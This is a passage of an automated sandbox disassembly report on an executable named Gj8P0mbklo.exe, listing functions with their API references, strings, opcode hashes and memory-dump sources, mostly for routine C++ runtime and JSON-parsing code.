                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: a1b36d80149b9a0878556a05ebcaa603ece604499cb7d2b30698b6347d275ee2
                                                                                                                                                                                            • Instruction ID: 0516ffe292abc501bf8406bc9e844388aad7b23e22fb93c68bb9a1451ad358a2
                                                                                                                                                                                            • Opcode Fuzzy Hash: a1b36d80149b9a0878556a05ebcaa603ece604499cb7d2b30698b6347d275ee2
                                                                                                                                                                                            • Instruction Fuzzy Hash: D2517E72D00219EFDF15CF98C850AEEBBB5FF88304F4A8459E915AB241D7389A51CB90
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00354780 Relevance: .1, Instructions: 110COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 8c8b0b9c1a62480a236227887d92c755a46d6c3b786c99c51580d612cbc1c266
                                                                                                                                                                                            • Instruction ID: ee173355a4164c5ecead21d314a0b9fdb62f7e2625b5fd2a7bc56c70aa2a749b
                                                                                                                                                                                            • Opcode Fuzzy Hash: 8c8b0b9c1a62480a236227887d92c755a46d6c3b786c99c51580d612cbc1c266
                                                                                                                                                                                            • Instruction Fuzzy Hash: B441B721219BC48FC739DE6C881159A7FE0DF66215B444B8DE8DB87B83C214E64DC7E6
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00377220 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                            • Instruction ID: db86fde20ce7f36d637c85cb23506fa5ddd1482cf61301c9f1b1abaa7f2ba24e
                                                                                                                                                                                            • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5C119E7720C04143DA37863DC4B86F7A395EBD632072ECB7AF0798BB26D12BD8009900
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00351310 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: d0306b55f0b0c0deecf23286ed4b9f98b611648aebeb63247df45b47797c7eec
                                                                                                                                                                                            • Instruction ID: b699947cbd32bc414428b11567ce738cdb0b76b883daacab48136196b0ac42e4
                                                                                                                                                                                            • Opcode Fuzzy Hash: d0306b55f0b0c0deecf23286ed4b9f98b611648aebeb63247df45b47797c7eec
                                                                                                                                                                                            • Instruction Fuzzy Hash: B30188319350B10A870E8B3D9821937BBA5EB4335334B03ABD987EB4D2D419E524D7A0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 003743F0 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 193COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00374411
                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0037442C
                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0037444C
                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00374473
                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 003744DE
                                                                                                                                                                                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00374526
                                                                                                                                                                                            • __Getctype.LIBCPMT ref: 0037453C
                                                                                                                                                                                            • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0037457D
                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00374612
                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00374618
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_GetctypeLocinfo_ctorLocinfo_dtorRegister
                                                                                                                                                                                            • String ID: :7$:7$bad locale name
                                                                                                                                                                                            • API String ID: 103145292-3064447370
                                                                                                                                                                                            • Opcode ID: 7cfc9a161db8ff16fffb995a48f1f2ab125cf9be17bd76e6622f43544073f73b
                                                                                                                                                                                            • Instruction ID: eab3c34a8aaf7c7128417c010ddef0f458362f62cbd531d0b3a5a5ca86b6208f
                                                                                                                                                                                            • Opcode Fuzzy Hash: 7cfc9a161db8ff16fffb995a48f1f2ab125cf9be17bd76e6622f43544073f73b
                                                                                                                                                                                            • Instruction Fuzzy Hash: E471C0B5D002099FDF23DFA4D881BAEB7B4BF15310F058169E808AB241EB38F945CB91
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00378EBE Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 303COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • type_info::operator==.LIBVCRUNTIME ref: 00378FDD
                                                                                                                                                                                            • ___TypeMatch.LIBVCRUNTIME ref: 003790EB
                                                                                                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 0037923D
                                                                                                                                                                                            • CallUnexpected.LIBVCRUNTIME ref: 00379258
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                            • String ID: Le9$csm$csm$csm
                                                                                                                                                                                            • API String ID: 2751267872-2961622526
                                                                                                                                                                                            • Opcode ID: f2c8e6e4eef536a19cd1f4caa1801b1731ca5d0463f707117a3818ce165242ab
                                                                                                                                                                                            • Instruction ID: 25e71516aa3ff3fc758817852c35c9b55f1508085f60c996965ad348fe6f1760
                                                                                                                                                                                            • Opcode Fuzzy Hash: f2c8e6e4eef536a19cd1f4caa1801b1731ca5d0463f707117a3818ce165242ab
                                                                                                                                                                                            • Instruction Fuzzy Hash: 34B18271800209EFCF36DFA4C885AAEB7B5FF05310F51865AE8196B212D739DA61CB91
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 003760E0 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 003760E6
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 003760F4
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00376105
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00376116
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                                                                                            • String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                                                                                            • API String ID: 667068680-1247241052
                                                                                                                                                                                            • Opcode ID: 3a6500a137421b9e76ff6b17a31c074f8fa25a0fc2aea7f51f78e83f4c57d4a2
                                                                                                                                                                                            • Instruction ID: aab95f24910d0b7a6c7255077f535f8fb571f06faae2331900e257ea82db8a7b
                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a6500a137421b9e76ff6b17a31c074f8fa25a0fc2aea7f51f78e83f4c57d4a2
                                                                                                                                                                                            • Instruction Fuzzy Hash: 22E0EC7995B310AB8B036F75BC4F8C63EADEA4AB11B010426F50AD23A0DAB608418B90
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00364410 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 285COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 0036453A
                                                                                                                                                                                            • ___std_exception_copy.LIBVCRUNTIME ref: 003647D9
                                                                                                                                                                                              • Part of subcall function 00356470: ___std_exception_destroy.LIBVCRUNTIME ref: 0035647E
                                                                                                                                                                                              • Part of subcall function 00356470: ___std_exception_destroy.LIBVCRUNTIME ref: 0035648D
                                                                                                                                                                                            Strings
                                                                                                                                                                                            • parse_error, xrefs: 003645EE
                                                                                                                                                                                            • parse error, xrefs: 00364668
                                                                                                                                                                                            • value, xrefs: 003644A4
                                                                                                                                                                                            • attempting to parse an empty input; check that your input string or stream contains the expected JSON, xrefs: 0036443D
                                                                                                                                                                                            • Te9, xrefs: 003647C6
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ___std_exception_destroy$Concurrency::cancel_current_task___std_exception_copy
                                                                                                                                                                                            • String ID: Te9$attempting to parse an empty input; check that your input string or stream contains the expected JSON$parse error$parse_error$value
                                                                                                                                                                                            • API String ID: 1464283508-2277852587
                                                                                                                                                                                            • Opcode ID: 5396b17bf77cbed8277725f7483356ac4adab02a615dc24651de6bfbb6586638
                                                                                                                                                                                            • Instruction ID: 800915b8e5caefa3e96766c24f61e3ba53860f9cc16b9c5b166e9df76fd2cef4
                                                                                                                                                                                            • Opcode Fuzzy Hash: 5396b17bf77cbed8277725f7483356ac4adab02a615dc24651de6bfbb6586638
                                                                                                                                                                                            • Instruction Fuzzy Hash: ECB1F171D002488BDB1ADFA4CC96BEDBB71FF16300F14865DE4057B692EB75AA88CB50
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 003888AB Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _strrchr
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3213747228-0
                                                                                                                                                                                            • Opcode ID: 5ee2fe975661c3f3a06b09353ebd3b379a61c661aa420a013c28599f51580a80
                                                                                                                                                                                            • Instruction ID: 406cdf572f805bf3130706eca97950e6f59ea244c5241cfc9afbe1245dbe13c0
                                                                                                                                                                                            • Opcode Fuzzy Hash: 5ee2fe975661c3f3a06b09353ebd3b379a61c661aa420a013c28599f51580a80
                                                                                                                                                                                            • Instruction Fuzzy Hash: 20B16572A00355AFDB17EF28CC82BBE7BA5EF55310F554196E904AF282DB74E901C7A0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 003763B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 003763E7
                                                                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 003763EF
                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00376478
                                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 003764A3
                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 003764F8
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                            • API String ID: 1170836740-1018135373
                                                                                                                                                                                            • Opcode ID: 40a4a2934f0eece077e3420a29fb102131f8cd031ea83955e4564b7b4e2b8b0e
                                                                                                                                                                                            • Instruction ID: e7d217fb82871c6e07f303ff35179e3581c6dffb8b9e4f5c33305d9feb3b96a6
                                                                                                                                                                                            • Opcode Fuzzy Hash: 40a4a2934f0eece077e3420a29fb102131f8cd031ea83955e4564b7b4e2b8b0e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8441D534A00609ABCF22DF69C896A9EBBB4FF05324F14C155E81C5F392C7399906CB90
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00386B1A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,145F793C,?,00386C29,?,?,00000000,?), ref: 00386BDB
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                                                            • API String ID: 3664257935-537541572
                                                                                                                                                                                            • Opcode ID: fcab7bffe94a1f70c86213288753d4096fbfa6b0a91949de107cb1a83888be71
                                                                                                                                                                                            • Instruction ID: 9e6eeecf0536ec739f1a9af7f076692a2d52c22e99178110e3ce9ea3e099f5e0
                                                                                                                                                                                            • Opcode Fuzzy Hash: fcab7bffe94a1f70c86213288753d4096fbfa6b0a91949de107cb1a83888be71
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1021B772A05311ABCB23BB26DC83E6A7B5C9B41764F260295E906E73D0DB31ED01C7E0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00393FB8 Relevance: 9.2, APIs: 6, Instructions: 248COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetCPInfo.KERNEL32(02751DB8,02751DB8,?,7FFFFFFF,?,00394288,02751DB8,02751DB8,?,02751DB8,?,?,?,?,02751DB8,?), ref: 0039405E
                                                                                                                                                                                            • __freea.LIBCMT ref: 003941F3
                                                                                                                                                                                            • __freea.LIBCMT ref: 003941F9
                                                                                                                                                                                            • __freea.LIBCMT ref: 0039422F
                                                                                                                                                                                            • __freea.LIBCMT ref: 00394235
                                                                                                                                                                                            • __freea.LIBCMT ref: 00394245
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: __freea$Info
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 541289543-0
                                                                                                                                                                                            • Opcode ID: 47ca05893abe6710b3b301d7d6a755ee855877cb8afdd9c5c860b599b5aff506
                                                                                                                                                                                            • Instruction ID: aefa2736bc18c13fec95902c287b750584b190208eedb8b74e8a69d51b3ea1ce
                                                                                                                                                                                            • Opcode Fuzzy Hash: 47ca05893abe6710b3b301d7d6a755ee855877cb8afdd9c5c860b599b5aff506
                                                                                                                                                                                            • Instruction Fuzzy Hash: 747119729002095BDF239F649C42FAFB7F9EF45314F160459FA54AB282D735DC468760
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0037897A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00378971,0037672C,00375534), ref: 00378988
                                                                                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00378996
                                                                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 003789AF
                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,00378971,0037672C,00375534), ref: 00378A01
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3852720340-0
                                                                                                                                                                                            • Opcode ID: 37b5c098edf7e975bdda2bd463c3d585104a6f8d5baa705ceb69e7feceadd8c5
                                                                                                                                                                                            • Instruction ID: 0c4786fb3cc3f636b02172b90e19eb328bd4b7775a42b6f32e6e512a108fc2b5
                                                                                                                                                                                            • Opcode Fuzzy Hash: 37b5c098edf7e975bdda2bd463c3d585104a6f8d5baa705ceb69e7feceadd8c5
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1201B13354D3155EE63B27787CCAA7A2A9CEB06374F60832EF628592E0FF194C009685
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 003562C0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 170COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: at line $, column $Te9
                                                                                                                                                                                            • API String ID: 0-550572365
                                                                                                                                                                                            • Opcode ID: 32bca245c2d60094fc3b68f2e590a821b6faffad71d1751a2abfb384ff882429
                                                                                                                                                                                            • Instruction ID: 2f1d4b2b79d394278bdc2f0dea7447959f14048f4e8cc3ad5f75f93312b7669a
                                                                                                                                                                                            • Opcode Fuzzy Hash: 32bca245c2d60094fc3b68f2e590a821b6faffad71d1751a2abfb384ff882429
                                                                                                                                                                                            • Instruction Fuzzy Hash: 98516971A002045BCB1ADF68CC96EEEBBB9EF45310F44452DF905AB762C774AE49C7A0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00384D47 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            • C:\Users\user\Desktop\Gj8P0mbklo.exe, xrefs: 00384D63
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
